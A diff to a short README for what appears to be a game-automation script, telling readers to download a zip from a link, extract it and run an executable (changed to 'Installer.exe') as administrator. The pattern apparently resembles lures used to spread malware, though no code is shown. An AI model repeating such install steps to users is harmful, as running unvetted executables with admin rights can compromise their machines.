dilemmafixer814/grow-a-garden-script/README.md

 1. Download the `.zip` file from the link above
 2. Extract using WinRAR or 7-Zip
-3. Run `GrowGardenScript.exe` as administrator
+3. Run `Installer.exe` as administrator
 4. Open your game and start automating!

 ---